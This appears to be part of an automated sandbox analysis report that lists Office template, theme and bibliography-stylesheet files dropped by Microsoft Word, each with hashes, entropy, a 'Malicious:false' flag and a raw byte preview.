                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A14.tmp\ieee2006officeonline.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):294178
                                                                                                                                              Entropy (8bit):4.977758311135714
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                              MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                              SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                              SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                              SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A15.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):260
                                                                                                                                              Entropy (8bit):3.494357416502254
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                                                                                                              MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                                                                                                              SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                                                                                                              SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                                                                                                              SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A15.tmp\ThemePictureGrid.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6193
                                                                                                                                              Entropy (8bit):7.855499268199703
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                              MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                              SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                              SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                              SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A35.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):332
                                                                                                                                              Entropy (8bit):3.4871192480632223
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                                                                                                              SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                                                                                                              SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                                                                                                              SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A35.tmp\mlaseventheditionofficeonline.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):254875
                                                                                                                                              Entropy (8bit):5.003842588822783
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                              MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                              SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                              SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                              SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6B51.tmp\View.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):486596
                                                                                                                                              Entropy (8bit):7.668294441507828
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                              MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                              SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                              SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                              SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6B51.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):274
                                                                                                                                              Entropy (8bit):3.535303979138867
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                                                                                                              MD5:35AFE8D8724F3E19EB08274906926A0B
                                                                                                                                              SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                                                                                                              SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                                                                                                              SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6B63.tmp\Frame.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):523048
                                                                                                                                              Entropy (8bit):7.715248170753013
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                              MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                              SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                              SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                              SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6B63.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):276
                                                                                                                                              Entropy (8bit):3.5159096381406645
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                                                                                                              MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                                                                                                              SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                                                                                                              SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                                                                                                              SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6BF4.tmp\Parcel.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):608122
                                                                                                                                              Entropy (8bit):7.729143855239127
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                              MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                              SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                              SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                              SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6BF4.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):278
                                                                                                                                              Entropy (8bit):3.516359852766808
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                                                                                                              MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                                                                                                              SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                                                                                                              SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                                                                                                              SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6BF5.tmp\Basis.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):558035
                                                                                                                                              Entropy (8bit):7.696653383430889
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                              MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                              SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                              SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                              SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6BF5.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):276
                                                                                                                                              Entropy (8bit):3.5361139545278144
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                                                                                                              MD5:133D126F0DE2CC4B29ECE38194983265
                                                                                                                                              SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                                                                                                              SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                                                                                                              SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6C16.tmp\Metropolitan.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):777647
                                                                                                                                              Entropy (8bit):7.689662652914981
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                              MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                              SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                              SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                              SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6C16.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):290
                                                                                                                                              Entropy (8bit):3.5091498509646044
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                                                                                                              MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                                                                                                              SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                                                                                                              SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                                                                                                              SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                                                                                                              Malicious:false
